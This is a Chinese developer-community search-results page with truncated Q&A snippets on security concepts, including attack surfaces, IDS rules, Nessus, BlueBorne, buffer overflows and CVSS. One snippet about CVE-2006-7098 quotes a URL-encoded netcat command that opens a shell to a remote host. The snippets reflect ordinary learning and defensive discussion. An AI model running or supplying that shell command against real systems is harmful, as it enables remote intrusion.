腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
3
回答
攻击
矢量,
攻击
面,
漏洞
,利用:区别在哪里?
、
我很难找出
攻击
矢量/
攻击
面/
漏洞
和利用之间的区别。根据维基百科(
漏洞
) 若要
攻击
漏洞
,
攻击
者必须至少有一个可用于连接到系统缺陷的工具或技术。在此框架中,
漏洞</em
浏览 0
提问于2015-06-04
得票数 25
回答已采纳
1
回答
模糊IDS规则
、
、
是否存在混淆IDS规则的已知技术,因此
攻击
者不能轻易地使用它们来反向设计他们检测到的
漏洞
? 让我提供一些背景情况。有时,IDS供应商会意识到零日
漏洞
(一个尚未公开披露的
漏洞
)。在这种情况下,人们可以制定一项规则来检测利用该
漏洞
并将其推给每个人,试图防止利用该
漏洞
.但这带来了新的风险。特别是,
攻击
者可能能够分析IDS规则并使用该规则获取一些线索,从而使
攻击
者更容易识别
漏洞
并开始使用该
漏洞
攻击
其他系统。
浏览 0
提问于2014-08-21
得票数 3
1
回答
漏洞
1:1有
漏洞
吗?
、
、
我要问的是,
攻击
是否被认为是利用特定
漏洞
,还是可以说多个
漏洞
利用了单个
漏洞
。例如,我们知道SQL通过SQL注入
攻击
有许多类型的
攻击
。我们是说SQL中通过发送意外命令来操作的
漏洞
本身就是
漏洞
,还是能够执行
攻击
操作的特定命令就是
漏洞
,这意味着它是1:1而不是1:*关系?
浏览 0
提问于2015-05-04
得票数 0
2
回答
使用Nessus还是专注于手工测试?
、
Nessus扫描了很多
漏洞
,所以我应该集中学习Nessus没有涵盖的
漏洞
,比如目录遍历
攻击
吗?我应该只研究Nessus没有覆盖的
漏洞
,或者学习所有的
漏洞
,无论Nessus是否覆盖。这两个问题是: Nessus没有给出它可以找到的
漏洞
列表(它检查的所有
漏洞
,后来告诉我们它容易受到这些
漏洞
的
攻击
)。我们不知道Nessus的效率有多高(就像XSS
攻击
一样,OWASP上有大量的过滤器规避方法,我不知道Nessus涵盖了其中的
浏览 0
提问于2016-04-30
得票数 4
回答已采纳
1
回答
如何保护Linux系统免受BlueBorne远程
攻击
?
、
、
、
、
Linux披露了基于Linux的BlueBorne
攻击
操作系统中的两个
漏洞
,这些
漏洞
允许
攻击
者完全控制受感染的设备。第一个
漏洞
是信息泄漏
漏洞
,它可以帮助
攻击
者确定目标设备使用的确切版本,并相应地调整他的
漏洞
。第二种是堆栈溢出,可以导致设备的完全控制。 例如,所有启用蓝牙的设备都应该被标记为恶意设备。此
攻击
不需要任何用户交互、身份验证或配对,使其几乎不可见。所有运行BlueZ的Linux设备都受到信息泄漏
漏洞
(CVE-
浏览 0
提问于2017-09-13
得票数 20
回答已采纳
1
回答
对DAO
攻击
的垃圾邮件反击是为了减缓
攻击
速度吗?
、
、
背景链接:您可以找到在DAO上安装递归调用
漏洞
攻击
涉及哪些帐户?中使用的帐户列表。您可以找到
攻击
发生在有任何方法可以确定DAO
攻击
者部署
攻击
所用的时间吗?中的时间段。 对DAO
攻击
的垃圾邮件反击是为了减缓
攻击
速度吗?
浏览 0
提问于2016-06-23
得票数 4
回答已采纳
1
回答
什么时候可以使用CVE: 2006-7098的开发?
、
、
、
我正在研究Apache的旧版本1.3.34的
漏洞
。我也不太明白在什么情况下CVE2006-7098
漏洞
可以被利用。nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d编译了cgipwn
漏洞
并将其安装在
攻击
者计算机apache的cgipwn中。从
攻击
者机器执行nc命令,指定-p作
浏览 0
提问于2015-06-03
得票数 0
回答已采纳
2
回答
Java反序列化问题
、
我一直在阅读Java反序列化
漏洞
,该
漏洞
会导致远程代码执行
攻击
。许多公开的功绩甚至可以用来进行
攻击
。 我没有找到任何描述
攻击
者如何利用该
漏洞
的教程。
浏览 0
提问于2017-07-07
得票数 1
3
回答
驱动下行and与缓冲区和堆栈溢出
攻击
、
、
今天,恶意软件的传播主要得益于浏览器及其插件中的
漏洞
。
攻击
者使用JavaScript
攻击
这些
漏洞
。这类
攻击
的两个例子是按驱动下载、缓冲区和堆栈溢出
攻击
。这两次
攻击
有什么区别?
浏览 0
提问于2014-08-14
得票数 0
回答已采纳
1
回答
查找缓冲区溢出代码
漏洞
我正在利用这里中的一个
漏洞
。 利用
漏洞
可以很好地工作,但是我想找出导致
漏洞
的代码,它是RET覆盖基
攻击
,RET地址被覆盖到shell代码。我想知道易受
攻击
的函数epilog和prelog。
浏览 0
提问于2018-02-11
得票数 2
1
回答
发现
漏洞
与开发
漏洞
的成本
、
、
从希望针对某个软件应用程序或目标开发零天
攻击
的人的角度来看,
攻击
者必须执行以下两项任务:(1)在软件中发现新的可利用
漏洞
;(2)为该
漏洞
开发可靠的武器化
攻击
。例如,模糊分析、反向分析和静态分析可能有助于发现
漏洞
;但是,构建一个可靠的
漏洞
需要进行单独的分析和工作。 这两项任务中哪一项的平均成本更高?我想知道这两项任务的经济状况是什么,并了解成本的比例。我知道,如果您查看单个
漏洞
,代价将取决于
漏洞
,但我要问的是一般情况。例如,如果我们看一
浏览 0
提问于2016-03-23
得票数 6
2
回答
查找有关CVE-2006-6876
漏洞
的信息。
、
、
、
为了研究SIP服务器的
漏洞
以及DOS
攻击
对QoS of VoIP服务的影响,我发现此
漏洞
可以被利用在SIP服务器上引发DoS。
攻击
者如何可能造成溢出?OpenSER上可能发生的溢出
攻击
和拒绝服务
攻击
之间的关系是什么? 我不了解
攻击
者的描述和执行的操作。
浏览 0
提问于2012-06-22
得票数 0
回答已采纳
1
回答
了解CVSS中访问复杂性的正确方法是什么?
、
我读过NVD(https://nvd.nist.gov/CVSS/v2-calculator)的访问复杂性, 此度量度量
攻击
者一旦访问目标系统就利用该
漏洞
所需的
攻击
的复杂性。媒体(M):在成功发动
攻击
之前,必须收集一些信息。低(L):
攻击
可以手动进行,几乎不需要技巧或额外的信息收集。我有一个问题:如果一个
漏洞
很难被发现,并且
攻击
者需要首先收集某些信息,但是该
漏洞
很容易被利用。如果本例中的访问复杂性度
浏览 0
提问于2016-03-23
得票数 0
3
回答
SOA
漏洞
、
、
我必须写一篇关于SOA
漏洞
(SOA安全性)的硕士论文。从这个意义上说,找到web服务中的
漏洞
或找到现有
漏洞
的解决方案。在这个方向上,我一直在寻找SOA中的
漏洞
。一旦发现了
漏洞
,我就必须刺激它并向我的向导展示。我在OWASP中发现的一些相应的
攻击
是DOS
攻击
,注入
攻击
(SQL注入,XPath注入)。我现在不能做出正确的决定,下一步该怎么做。
浏览 0
提问于2010-02-04
得票数 1
回答已采纳
1
回答
哪些著名的
攻击
使用了免使用
漏洞
?
、
、
我正在编译
漏洞
和相关的
攻击
,我需要找到一个著名的
攻击
,利用一个使用后无
漏洞
。我找了一段时间了,虽然我似乎找不到任何东西。我知道很多时候在互联网浏览器和其他软件中都发现了自由后使用,虽然我只知道
漏洞
和更新页面,而不是具体的
攻击
。
浏览 0
提问于2018-10-29
得票数 0
1
回答
查找堆栈缓冲区溢出
、
、
、
、
我编写了一个易受
攻击
的程序,并利用它,在端口7777上运行了一个易受
攻击
的服务器,溢出并利用了这个
漏洞
。但我不明白的是如何在Windows (或其他操作系统)或软件中查找
漏洞
。我使用gcc和gdb进行调试,以找到编写该
漏洞
所需的所有内容。如何在其他程序/软件上发现堆栈缓冲区溢出
漏洞
,以及如何调试易受
攻击
的程序,或者如何使用gdb?
浏览 3
提问于2015-04-24
得票数 7
回答已采纳
2
回答
有办法嗅出“老鼠杰克”的
攻击
吗?
我相信你们中的很多人都知道未加密无线鼠标的
漏洞
。如果不是,这里有一个报告
漏洞
的网站:https://www.mousejack.com/由于通信是未加密的,我认为
攻击
也是未加密的,所以我认为在公共空间“嗅探”这种
攻击
是非常容易的。然而,作为一个消费者,我没有能力写出我的代码并使用我现有的无线鼠
浏览 0
提问于2016-04-07
得票数 1
1
回答
通过心脏出血消除敏感信息
通过HeartBleed
漏洞
获取敏感信息的可能性是什么? 据我所见,这种
攻击
需要有人或什么东西将
漏洞
“发送”到服务器,所以如果没有人使用易受
攻击
的服务器,那么
攻击
者必须等待很长时间才能获得敏感信息?
浏览 0
提问于2016-11-28
得票数 0
回答已采纳
1
回答
是否有任何非接触式(RFID/NFC)卡
漏洞
仍未解决?即使是小的
、
、
、
、
市场对这类问题非常保密,因为公司不会给
攻击
者提供滥用的
漏洞
,并且会泄露出被解决的
漏洞
,
攻击
者也会这么想,但也许某个地方泄露了一次未解决的
攻击
,我很有兴趣了解这一点。
浏览 0
提问于2020-10-13
得票数 1
回答已采纳
1
回答
演示VM逃逸
、
、
、
、
经过一些轻松的研究,我发现了一个
漏洞
CVE-2014-0983“甲骨文VirtualBox 3D加速多内存腐败
漏洞
”。Rapid7 7网站显示,针对metasploit的
攻击
可用于触发此
漏洞
。如果我希望
攻击
看起来很遥远,那么运行
漏洞
的最佳方式是什么?(我使用另一台PC充当远程
攻击
者)该
漏洞
据说是在运行VirtualBox 4.3.6的Windows7主机上进行测试的,但没有提到哪个操作系统正在虚拟盒上运行。 还有更多的方法来演示VM逃逸吗?
浏览 0
提问于2016-10-25
得票数 5
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
上传漏洞攻击总结
网站漏洞修复方案防止SQL注入攻击漏洞
Web 安全漏洞之 XSS 攻击
Loopring:部分智能钱包遭漏洞攻击,正在追查攻击者
安卓系统有漏洞,小心被攻击
热门
标签
更多标签
云服务器
ICP备案
云直播
对象存储
腾讯会议
活动推荐
运营活动
广告
关闭
领券